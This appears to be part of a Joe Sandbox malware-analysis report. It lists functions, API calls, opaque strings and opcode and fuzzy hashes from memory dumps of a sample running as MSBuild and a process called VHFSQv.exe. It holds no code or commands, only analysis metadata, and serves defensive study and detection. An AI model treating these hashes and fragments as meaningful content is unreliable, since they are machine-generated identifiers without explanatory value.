Instruction ID: a3efce7865e89bb65312844e7b182c3996aad1d42549dfa60581cdfe5de22877
Opcode Fuzzy Hash: d62a46599cfe128473581da69c8ca8e85c1f2acf9a9fe832cb3ca126be21690e
Instruction Fuzzy Hash: 2D816870A00B458FD7A4DF6AD45476ABBF1FF88704F008A6DD88AD7A50D7B4E849CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0675D804 Relevance: 1.6, APIs: 1, Instructions: 119COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0675D922

Memory Dump Source

Source File: 00000010.00000002.2892732693.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6750000_MSBuild.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 6e30f59e59fdb9fbb8e95c4987774b4d3cb32acc863a958c360a87ca581d055d
Instruction ID: cb554600d7dcc8a3f012132faec9ac9eefd2d84289720682d74fede8b0611d42
Opcode Fuzzy Hash: 6e30f59e59fdb9fbb8e95c4987774b4d3cb32acc863a958c360a87ca581d055d
Instruction Fuzzy Hash: 4B51D2B0D003499FDB24CF99C884ADEBBB5FF48310F24856AE818AB210D775A881CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0675D810 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0675D922

Memory Dump Source

Source File: 00000010.00000002.2892732693.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6750000_MSBuild.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 8c9daac88664770f318e89995b58ab0b5f38075402e9410dfb9eb7067582c388
Instruction ID: 0e2e9005503ccb6173fe76bb679f088a31155876908ce6b9d65d8a4dd998ce73
Opcode Fuzzy Hash: 8c9daac88664770f318e89995b58ab0b5f38075402e9410dfb9eb7067582c388
Instruction Fuzzy Hash: 8441C1B1D003499FDB24CF99C884ADEBBB5FF48310F25826AE818AB210D775A945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0675CD6C Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 0675FE91

Memory Dump Source

Source File: 00000010.00000002.2892732693.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6750000_MSBuild.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 3a6c26e189fa89a2900780390fd52a7a91e9b911857fc1ee8b8142d39e9c394c
Instruction ID: 7386fea2f241d883d1c672f9ac7c7b089c1bf0bb5cdb1ea166d9dc3849f32fab
Opcode Fuzzy Hash: 3a6c26e189fa89a2900780390fd52a7a91e9b911857fc1ee8b8142d39e9c394c
Instruction Fuzzy Hash: AA413AB4900309CFDB54DF99C488AAABBF5FF88314F25C499D519AB321D778A841CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 06753048 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 067530D7

Memory Dump Source

Source File: 00000010.00000002.2892732693.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6750000_MSBuild.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: ac1705e66955eed7fb57ecaf99f65e3b13c4759074edb07d8b2923233827faf2
Instruction ID: 41575a37a21c7351b99a1cc41a6b344ac6a6322e765f4f3f92ea4ba178047405
Opcode Fuzzy Hash: ac1705e66955eed7fb57ecaf99f65e3b13c4759074edb07d8b2923233827faf2
Instruction Fuzzy Hash: B921E3B5D002489FDB10CF9AD584AEEBBF5FB48310F14855AE919A3350D379A940CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06753050 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 067530D7

Memory Dump Source

Source File: 00000010.00000002.2892732693.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6750000_MSBuild.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: ffb8f2cc80a80fe16b3ed8fd0806b076962bb57e654e8050fbcc786f7035b7fc
Instruction ID: e796560c07fa97ef18dde28eea02622ded25f63d693bcee785591fb461859fde
Opcode Fuzzy Hash: ffb8f2cc80a80fe16b3ed8fd0806b076962bb57e654e8050fbcc786f7035b7fc
Instruction Fuzzy Hash: ED21B5B5D002489FDB10CF9AD584ADEBBF5FB48310F14845AE918A3350D379A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 01587249 Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(00000000), ref: 015872C0

Memory Dump Source

Source File: 00000010.00000002.2750557408.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_MSBuild.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 79557b1378ffc64bdf56f754cbc8b89d4e5e336457a49fdb5a6f45be54f6be76
Instruction ID: 0059f4c34490c358e5d30c752175c28824ffe4397ac0580f4d6e45d47b19d756
Opcode Fuzzy Hash: 79557b1378ffc64bdf56f754cbc8b89d4e5e336457a49fdb5a6f45be54f6be76
Instruction Fuzzy Hash: AE2158B2C0065A8BCB10DF9AD5447AEFBF4FF48320F15856AD919B7241D338A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0675B67B Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0675B4F9,00000800,00000000,00000000), ref: 0675B6EA

Memory Dump Source

Source File: 00000010.00000002.2892732693.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6750000_MSBuild.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c79a8c2a7619dc603348d626fde9bffaf4c152f7a247210550d0c43a2ce91bd8
Instruction ID: 74924710be1c0c46949b24725f841f05d441028935d140c616679917cfe1ef72
Opcode Fuzzy Hash: c79a8c2a7619dc603348d626fde9bffaf4c152f7a247210550d0c43a2ce91bd8
Instruction Fuzzy Hash: 761103B6C003088FCB20CF9AD844AAEFBF8EB48710F10846AD819A7210C379A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 01587250 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(00000000), ref: 015872C0

Memory Dump Source

Source File: 00000010.00000002.2750557408.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_MSBuild.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 565b1c96da30d4bb25b483e743011f016e2524bb44de1dcf7fef136243f8ed7c
Instruction ID: 2369e318a00f90f5ceb205f6befb3f06b8079b8b3d6ef9277b8abcb0bed0145b
Opcode Fuzzy Hash: 565b1c96da30d4bb25b483e743011f016e2524bb44de1dcf7fef136243f8ed7c
Instruction Fuzzy Hash: 901147B1C0065A9BCB14DF9AD544BAEFBF4FF48320F10812AE818B7240D738A940CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0678E680 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE ref: 0678E6EF

Memory Dump Source

Source File: 00000010.00000002.2899243517.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6780000_MSBuild.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 3945ae11013e427c65d1e295506f7bcf234c51a242e0d5d34fb2c0686517b428
Instruction ID: 15e433ad6d8309e694eed5b8a5714e3ef3ef25daf45117873ca4aee200c2f9ab
Opcode Fuzzy Hash: 3945ae11013e427c65d1e295506f7bcf234c51a242e0d5d34fb2c0686517b428
Instruction Fuzzy Hash: 181103B1C006A99FCB10DF9AD5446EEFBB4BF48314F15816AD818A7240D378A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0678DDBC Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE ref: 0678E6EF

Memory Dump Source

Source File: 00000010.00000002.2899243517.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6780000_MSBuild.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: cb99454bf45822777e05dfeac9145ce42429c993a4a736af9237ac51ad583034
Instruction ID: 621b1d74b7d73cadebfbc5354acd621470748e9ccc69256a4b60d201de3ac698
Opcode Fuzzy Hash: cb99454bf45822777e05dfeac9145ce42429c993a4a736af9237ac51ad583034
Instruction Fuzzy Hash: 7A1103B1C006599FCB10DF9AC4446AEFBF4FF48314F15816AE918A7241E378A940CFE5

Uniqueness

Uniqueness Score: -1.00%

Function 0675A1C0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0675B4F9,00000800,00000000,00000000), ref: 0675B6EA

Memory Dump Source

Source File: 00000010.00000002.2892732693.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6750000_MSBuild.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 24ea14cf6f4ed7595aa377d51bd47ed35755249299b6e3254bca1a1365dc9e9a
Instruction ID: fc4daa120f9893dafe7a69a05f4b1ff88472791e5854d40ecb4a267b1ece277a
Opcode Fuzzy Hash: 24ea14cf6f4ed7595aa377d51bd47ed35755249299b6e3254bca1a1365dc9e9a
Instruction Fuzzy Hash: FC1117B5C003088FDB10CF9AD444AAEFBF4FB48710F11856AE919A7210D379A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0675B418 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0675B47E

Memory Dump Source

Source File: 00000010.00000002.2892732693.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6750000_MSBuild.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: fb40039baf7a65a9059fd8cfe50d47bbcec29d69c8e38d5c51ca4333507f1ed3
Instruction ID: 53b0bfb19c9d550d64fd1954d05cbbe48c4fe5e160eceae8f979649affa89e9e
Opcode Fuzzy Hash: fb40039baf7a65a9059fd8cfe50d47bbcec29d69c8e38d5c51ca4333507f1ed3
Instruction Fuzzy Hash: E711E0B5C003498FDB20DF9AD444AEEFBF4EF88714F11856AD819A7210C379A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0130D030 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2711614436.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_130d000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ed562db559d426ca8140c94c23fe8ed38f40890dca08947b1f720bff150333d
Instruction ID: 5e38033ef527284a8135a095cd6c696d146e647efc94f8aeb8c270cdd7210d17
Opcode Fuzzy Hash: 6ed562db559d426ca8140c94c23fe8ed38f40890dca08947b1f720bff150333d
Instruction Fuzzy Hash: 262122B1604204DFDB16DF98D990B26BFE9FB84318F20C56DE90D0B296C33AD406CA62

Uniqueness

Uniqueness Score: -1.00%

Function 0130D02B Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2711614436.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_130d000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: 2b25af1e68eb6daf082d07e5fdba6b5d251dbe9dd4093e609e69a5484e2da77d
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: 5611BE75504280CFDB16CF94D9D4B15BFA1FB84318F24C6AAD8494B697C33AD44ACB62

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 067853E0 Relevance: 13.0, Strings: 10, Instructions: 477COMMON

Download Yara Rule

Strings

$]q, xrefs: 0678596D
$]q, xrefs: 067854EB
$]q, xrefs: 06785979
$]q, xrefs: 06785528
$]q, xrefs: 067858B9
$]q, xrefs: 06785963
$]q, xrefs: 06785957
$]q, xrefs: 0678551C
$]q, xrefs: 067858C5
$]q, xrefs: 067854F7

Memory Dump Source

Source File: 00000010.00000002.2899243517.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6780000_MSBuild.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-2843079600
Opcode ID: 53f24d0f28667ddc07af61e2699fc4cf4e4c7d738d0a96adedde8bae7a4febbb
Instruction ID: 17455a5edb92e3dfad5f01b6389bd22c0d47af5ea959cd1ee386d6d6080509ae
Opcode Fuzzy Hash: 53f24d0f28667ddc07af61e2699fc4cf4e4c7d738d0a96adedde8bae7a4febbb
Instruction Fuzzy Hash: 69125030B40219CFDBA4EF65C894A6EB7F2BF85314F208569D50AAB354DB34DD85CB81

Uniqueness

Uniqueness Score: -1.00%

Function 06784D60 Relevance: 9.2, Strings: 7, Instructions: 442COMMON

Download Yara Rule

Strings

$]q, xrefs: 067850BA
$]q, xrefs: 067852CD
$]q, xrefs: 067852D9
.5uq, xrefs: 06784DBB
$]q, xrefs: 0678525D
$]q, xrefs: 067850C6
$]q, xrefs: 06785042

Memory Dump Source

Source File: 00000010.00000002.2899243517.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6780000_MSBuild.jbxd

Similarity

API ID:
String ID: .5uq$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-981061697
Opcode ID: 1de936262c9de1cc354aeb3f3cf896889a628a19440f772e1894cf5553a72398
Instruction ID: c254644b627a9e4be9661e503473bc64c788bbbe7bc1498e626c9a032ddb5ce5
Opcode Fuzzy Hash: 1de936262c9de1cc354aeb3f3cf896889a628a19440f772e1894cf5553a72398
Instruction Fuzzy Hash: 7B026F30B40209CFDB99EFA5D45466EB7B6FF84304F248529D406AB398DB79DC86CB81

Uniqueness

Uniqueness Score: -1.00%

Function 06780F05 Relevance: 7.9, Strings: 6, Instructions: 411COMMON

Download Yara Rule

Strings

$]q, xrefs: 0678143F
$]q, xrefs: 06781457
$]q, xrefs: 06781433
$]q, xrefs: 06781416
$]q, xrefs: 0678140A
$]q, xrefs: 06781463

Memory Dump Source

Source File: 00000010.00000002.2899243517.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6780000_MSBuild.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-3723351465
Opcode ID: bea5f9314bc3403a3fdf7251ac32046770d37e0420ad5ce8645ef84948403f8c
Instruction ID: c9b34f9028ee8a40bbffd65a0aef914848afc5c13e4322884fa2b861a4f16b78
Opcode Fuzzy Hash: bea5f9314bc3403a3fdf7251ac32046770d37e0420ad5ce8645ef84948403f8c
Instruction Fuzzy Hash: E7024031E1061A8FCB55EF75C89459DB7B2FFC9304F60866AD409AB264EF30AD86CB40

Uniqueness

Uniqueness Score: -1.00%

Function 015841C8 Relevance: 1.5, Strings: 1, Instructions: 281COMMON

Download Yara Rule

Strings

\Vl, xrefs: 0158447F

Memory Dump Source

Source File: 00000010.00000002.2750557408.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_MSBuild.jbxd

Similarity

API ID:
String ID: \Vl
API String ID: 0-682378881
Opcode ID: ff9d4c6a3c83f7b3fb1046ba0b5398cec768b7376b5c43e1186cb7f0fad6a985
Instruction ID: de41274ee1cc2442e8eb8d9998361d1587d5c5adf53b8790a265a1b491f11811
Opcode Fuzzy Hash: ff9d4c6a3c83f7b3fb1046ba0b5398cec768b7376b5c43e1186cb7f0fad6a985
Instruction Fuzzy Hash: 06B12C70E0020A8FDF14DFADC9857ADBBF2BF88314F148529D815BB294EB749885CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0678C3B8 Relevance: .4, Instructions: 360COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2899243517.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6780000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4061f82401a7917c25d59b900d0f16e9a369a810196b7ceb56537974f1f2d3d1
Instruction ID: 9ef647ff226cbc7a15971236221613fc58d87ed0bd88dc51ec4387682bd089e4
Opcode Fuzzy Hash: 4061f82401a7917c25d59b900d0f16e9a369a810196b7ceb56537974f1f2d3d1
Instruction Fuzzy Hash: 5BD1D330F401058FDF55EB68C484BBEB7A2EB84300F248969D40AEB395DB75DC86C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0675BB58 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2892732693.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6750000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b01e32fd94b55532d41bf594557b87363a898b07b3f84aa7d7ba093fd42685a
Instruction ID: 1b7bb305dc71e1c5616337f7ecf6b57bbf2d004f5c01aaa702305cf2c61b9687
Opcode Fuzzy Hash: 7b01e32fd94b55532d41bf594557b87363a898b07b3f84aa7d7ba093fd42685a
Instruction Fuzzy Hash: 16127BB14017469AE334CF65E98C1897BB1BBC1338BD0C309D2612A6EDDBB8158BCF85

Uniqueness

Uniqueness Score: -1.00%

Function 0675A068 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2892732693.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6750000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a99c6b5924090a2538059c43f54fdf005ce0b32b770d14504d00ce33ffe21efd
Instruction ID: 77fe758a705b3b5b58a84da6458fd340416a23e533bcfa31bd75d16cc0dd1fe8
Opcode Fuzzy Hash: a99c6b5924090a2538059c43f54fdf005ce0b32b770d14504d00ce33ffe21efd
Instruction Fuzzy Hash: 98A16432E10219CFCF45DFB5C8445AEB7B2FF84300B1686BAE915AB215EB75D945CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0675BB57 Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2892732693.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6750000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7189a1362ca508075aae3499d6b1c8d0fdf67fa956d628c42aa6f6b05d58c502
Instruction ID: 3a3fafd275d42bf9ca4e3b3b6e652fc4c38a5533dce79ac5a4b9b038d68a8d50
Opcode Fuzzy Hash: 7189a1362ca508075aae3499d6b1c8d0fdf67fa956d628c42aa6f6b05d58c502
Instruction Fuzzy Hash: 1AC1F2B1811746DAD724CF65E8881897BB1BBC5338FA1C309D2616B2EDDBB4158BCF84

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: VHFSQv.exePID: 82112, Parent PID: 1028COMMON

Executed Functions

Function 01731CC0 Relevance: 8.0, Strings: 6, Instructions: 483COMMON

Download Yara Rule

Strings

$]q, xrefs: 01731D0E
LR]q, xrefs: 01731E69
", xrefs: 01731F97
$]q, xrefs: 01731D1A
LR]q, xrefs: 0173213F
LR]q, xrefs: 01731EDF

Memory Dump Source

Source File: 00000018.00000002.2660353795.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1730000_VHFSQv.jbxd

Similarity

API ID:
String ID: "$LR]q$LR]q$LR]q$$]q$$]q
API String ID: 0-1755660813
Opcode ID: 901d7ae8431bf67cd7e70788cd252e1fe5a87736a7791a4c0cd0bccd9ddc4e4c
Instruction ID: 2d488dd76a04cb00b997b17e194b2ca7801a74f5436119d706ba08845ef9a8fb
Opcode Fuzzy Hash: 901d7ae8431bf67cd7e70788cd252e1fe5a87736a7791a4c0cd0bccd9ddc4e4c
Instruction Fuzzy Hash: 8A029E74B001068FCB15CFA9C894AAEB7F6FFC8300F148569D4169B2A6DB74ED46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01732788 Relevance: 2.0, Instructions: 2002COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2660353795.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1730000_VHFSQv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b1dc192653a1eee44c8b379de7f9e732b31d042f4e3f340a0ea1672c214ef1e
Instruction ID: aba8c42c3c6a7b5e08186b07a761e070395039d5491fdb9549048f18eb67a2c9
Opcode Fuzzy Hash: 2b1dc192653a1eee44c8b379de7f9e732b31d042f4e3f340a0ea1672c214ef1e
Instruction Fuzzy Hash: 4003BE34A0030ADFDB26DF69CD54B99B7BAFF89700F118596E4086B2A5CB716EC1CB41

Uniqueness

Uniqueness Score: -1.00%

Function 01735A41 Relevance: 1.7, Strings: 1, Instructions: 437COMMON

Download Yara Rule

Strings

$]q, xrefs: 01735A71

Memory Dump Source

Source File: 00000018.00000002.2660353795.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1730000_VHFSQv.jbxd

Similarity

API ID:
String ID: $]q
API String ID: 0-1007455737
Opcode ID: 5d76b97ced9996676864ae357de2ee086a63a4379d841909b8fc5aa586b238d2
Instruction ID: 898914c3560f2fc44352ebf08864be32a7aa91bd28993280f2ac82fd040f0b47
Opcode Fuzzy Hash: 5d76b97ced9996676864ae357de2ee086a63a4379d841909b8fc5aa586b238d2
Instruction Fuzzy Hash: 51F18E34A00206DFDB28CF69C984B6EB7F2BF88705F148529D5069B292DB35EC82CF51

Uniqueness

Uniqueness Score: -1.00%

Function 017317C8 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

Haq, xrefs: 0173181D
(aq, xrefs: 017318B1

Memory Dump Source

Source File: 00000018.00000002.2660353795.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1730000_VHFSQv.jbxd

Similarity

API ID:
String ID: (aq$Haq
API String ID: 0-3785302501
Opcode ID: 567533a77053274bbaf04544894ea9918b209041fc4ec10869eab0934cd71b09
Instruction ID: e4da54a62c3fddd4e95f518f4a2fb12e7384078945fed3f48ec17857911e61d8
Opcode Fuzzy Hash: 567533a77053274bbaf04544894ea9918b209041fc4ec10869eab0934cd71b09
Instruction Fuzzy Hash: C451AA71E002199FCB09DFAA98146EEBBF2EFD5210F1484AAD409E7255EB344A16CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01734C69 Relevance: 1.7, Strings: 1, Instructions: 420COMMON

Download Yara Rule

Strings

`Q]q, xrefs: 01734FBA

Memory Dump Source

Source File: 00000018.00000002.2660353795.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1730000_VHFSQv.jbxd

Similarity

API ID:
String ID: `Q]q
API String ID: 0-1594560043
Opcode ID: e637ad540fd4f901a00dbff49719226161c38915a63319e277df4e7e9e744720
Instruction ID: b22a1d373401024fcf06a9f43c07e6516fa83d96235aaf1067dc8a23fe24a3e1
Opcode Fuzzy Hash: e637ad540fd4f901a00dbff49719226161c38915a63319e277df4e7e9e744720
Instruction Fuzzy Hash: FA21F074A002468FDB08DFBAC854BADBBF1BF8A300F08006AC442FB295DB359D05CB61

Uniqueness

Uniqueness Score: -1.00%

Function 01731B68 Relevance: 1.4, Strings: 1, Instructions: 128COMMON

Download Yara Rule

Strings

tP]q, xrefs: 01731C43

Memory Dump Source

Source File: 00000018.00000002.2660353795.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1730000_VHFSQv.jbxd

Similarity

API ID:
String ID: tP]q
API String ID: 0-2175968468
Opcode ID: e97fec727467dd6ffbb49e7c39e6b7054656b617fd65904ce093ff8228418718
Instruction ID: a0e4cee15632c8a5be6bd0249d79aef15f8147d974d189c780e83942b116bd21
Opcode Fuzzy Hash: e97fec727467dd6ffbb49e7c39e6b7054656b617fd65904ce093ff8228418718
Instruction Fuzzy Hash: EA4111B1B01241CFCB09DF78C8589ADFFB1BF85715B4940A9C4099F262EB35D802CB81

Uniqueness

Uniqueness Score: -1.00%

Function 01730848 Relevance: 1.4, Strings: 1, Instructions: 117COMMON

Download Yara Rule

Strings

4']q, xrefs: 0173085B

Memory Dump Source

Source File: 00000018.00000002.2660353795.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1730000_VHFSQv.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: f18d512f0a762e7cfc774e9e6e5d2e9aece703011ee147c4b09f19173d1373fb
Instruction ID: 66b1a07531babd3b309ff78e6219149f07a4dd7bddbfeccd0c7f27f8dc4a403a
Opcode Fuzzy Hash: f18d512f0a762e7cfc774e9e6e5d2e9aece703011ee147c4b09f19173d1373fb
Instruction Fuzzy Hash: 6C415170A002099FCB04DFB9E954BADBBF6FF84304F108569E105AB365DB749D4ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 01731CB0 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

$]q, xrefs: 01731D0E

Memory Dump Source

Source File: 00000018.00000002.2660353795.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1730000_VHFSQv.jbxd

Similarity

API ID:
String ID: $]q
API String ID: 0-1007455737
Opcode ID: 94922147b6441236f5033c98aaa4502d662ce0dc37d92554a2a118b05190b389
Instruction ID: b0475e2777295ac8bc12fc033017640caf858055c8656382f6ea8111744b7893
Opcode Fuzzy Hash: 94922147b6441236f5033c98aaa4502d662ce0dc37d92554a2a118b05190b389
Instruction Fuzzy Hash: 83419139A00109DFCB18DF69DC588AABBF6FF8931071182A9E816DB365EB309D45CF51

Uniqueness

Uniqueness Score: -1.00%

Function 01730838 Relevance: 1.3, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

4']q, xrefs: 0173085B

Memory Dump Source

Source File: 00000018.00000002.2660353795.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1730000_VHFSQv.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: 142d95d2d82f734b95631c193880370fd02c9834be41dc9d937e1ccd525b5a0c
Instruction ID: 23c080509b3807688d39629d2137f97c3245cf3d387b84ea2d9915085ec1a2b1
Opcode Fuzzy Hash: 142d95d2d82f734b95631c193880370fd02c9834be41dc9d937e1ccd525b5a0c
